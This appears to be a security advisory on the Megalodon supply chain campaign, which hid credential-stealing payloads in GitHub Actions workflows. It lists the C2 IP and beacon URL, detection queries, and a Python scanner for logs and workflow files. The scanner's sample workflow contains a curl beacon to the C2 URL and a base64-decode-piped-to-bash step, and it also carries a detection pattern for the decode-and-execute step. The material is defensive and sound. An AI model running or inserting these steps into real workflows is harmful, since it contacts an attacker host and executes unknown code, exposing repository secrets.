Date: 06/05/2026
Severity: High
Summary
A large-scale software supply chain campaign dubbed Megalodon leveraged malicious modifications to GitHub Actions workflows to steal sensitive credentials from affected repositories. Analysis revealed credential-harvesting capabilities targeting GitHub tokens, cloud credentials, API keys, database secrets, and private keys.

The attack abused trusted CI/CD workflows by embedding obfuscated payloads that executed during automated build processes, where the secrets granted to the job are available to any step that runs. Investigation uncovered evidence of external command-and-control (C2) communication and large-scale distribution of similar malicious payloads across thousands of GitHub repositories, highlighting the growing risk posed by CI/CD pipeline compromises within the open-source ecosystem.

Organizations relying on GitHub Actions and automated software delivery pipelines should review every change to workflow files (under .github/workflows), treat any secret available to a run that contacted the indicators below as exposed and rotate it, and strengthen repository security controls to mitigate similar threats.
Indicators of Compromise (IOC) List
URL : | http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx |
IP Address: | 216.126.225.129 |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 : | domainname like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" or url like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" or siteurl like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" |
Note: the id parameter in the IOC URL may be specific to one victim, so an exact match on the full URL can miss beacons from other repositories that differ only in that value; pair this query with Detection Query 2, which matches the host regardless of the URL.
Detection Query 2 : | dstipaddress IN ("216.126.225.129") or srcipaddress IN ("216.126.225.129") |
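The two queries above match the exact IOC string and the C2 IP. As an added example, not code from Gurucul's advisory or its TDIR product, the following Python applies the same two checks to constructed proxy log lines, parsing the beacon URL's query string so that a beacon whose id value differs from the published IOC is still caught, and scans a constructed workflow file for the IOCs plus one generic decode-and-execute heuristic. The log format, the second victim id, the workflow contents, the field names chosen for the query parameters (campaign, leak type, victim id) and the heuristic are assumptions, not details taken from the advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the advisory above.
C2_IP = "216.126.225.129"
C2_PORT = 8443
C2_CAMPAIGN_TAG = "megalodon"  # value of the "h" query parameter in the IOC URL

# Constructed sample proxy log, format: "<timestamp> <src_ip> <dst_ip> <method> <url>".
# The second beacon carries a different "id" value, which an exact match on the
# published IOC URL would not catch (assumed: "id" is a per-victim identifier).
SAMPLE_PROXY_LOG = """\
2026-05-06T10:14:02Z 10.0.3.15 216.126.225.129 POST http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx
2026-05-06T10:14:05Z 10.0.3.15 140.82.112.3 GET https://api.github.com/repos/example/repo/actions/runs
2026-05-06T10:21:40Z 10.0.7.22 216.126.225.129 POST http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=zz91kq2p0ab
2026-05-06T10:30:11Z 10.0.3.15 93.184.216.34 GET https://example.com/
"""

# Constructed sample workflow with an unobfuscated beacon to the IOC URL
# (illustrative only; the advisory says the real payloads were obfuscated).
SAMPLE_WORKFLOW = """\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: curl -s "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx"
      - run: echo "$PAYLOAD" | base64 -d | bash
"""

BARE_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?")
# Assumed generic heuristic: a base64-decoded blob piped straight into a shell.
DECODE_AND_RUN = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z)?sh\b")


def classify_url(url):
    """Return the beacon's query fields if `url` targets the C2 host, else None.
    Matching on the host (and recording the port) rather than on the full IOC
    string means a beacon with a different per-victim id still matches."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:
        return None  # malformed URL or port
    if host != C2_IP:
        return None
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {
        "host": host,
        "port": port,
        "campaign": params.get("h"),
        "leak_type": params.get("l"),
        "victim_id": params.get("id"),
        "exact_ioc_port": port == C2_PORT,
    }


def scan_proxy_log(lines):
    """Apply both detections from the page (URL match and destination IP match)
    to log lines in the sample format; return one hit per matching line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed or empty lines
        ts, src, dst, _method, url = fields
        info = classify_url(url)
        if info is None and dst == C2_IP:
            # TLS or non-HTTP traffic may log only the destination IP.
            info = {"host": dst, "port": None, "campaign": None,
                    "leak_type": None, "victim_id": None, "exact_ioc_port": False}
        if info is not None:
            hits.append({"ts": ts, "src": src, **info})
    return hits


def scan_workflow(text):
    """Flag workflow lines that reference the C2, contact a bare-IP URL, or
    decode and execute an embedded blob (the last two are assumed heuristics,
    not signatures taken from the advisory)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        reasons = []
        if C2_IP in line:
            reasons.append("references Megalodon C2 IP " + C2_IP)
        if f"h={C2_CAMPAIGN_TAG}" in line:
            reasons.append("carries Megalodon campaign tag in query string")
        m = BARE_IP_URL.search(line)
        if m and C2_IP not in line:
            reasons.append("contacts a bare-IP URL " + m.group(0))
        if DECODE_AND_RUN.search(line):
            reasons.append("base64-decodes and executes an embedded blob")
        if reasons:
            findings.append({"line": lineno, "reasons": reasons, "text": line.strip()})
    return findings


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print("C2 beacon:", hit)
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print("workflow line %d: %s" % (finding["line"], "; ".join(finding["reasons"])))
```

On the sample log the scanner reports both beacons, including the one with the unpublished id, and records which source host sent each, which is the list of runners or repositories whose secrets should be rotated. On the sample workflow it flags the curl step on the IOC alone and the final step on the decode-and-execute heuristic only; since the advisory states that the real payloads were obfuscated, the heuristic rather than the literal IOC is what would catch a variant that hides the URL.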
Reference:
https://gurucul.com/blog/megalodon-malware-found-in-2800-github-files-through-malicious-github-actions-workflows/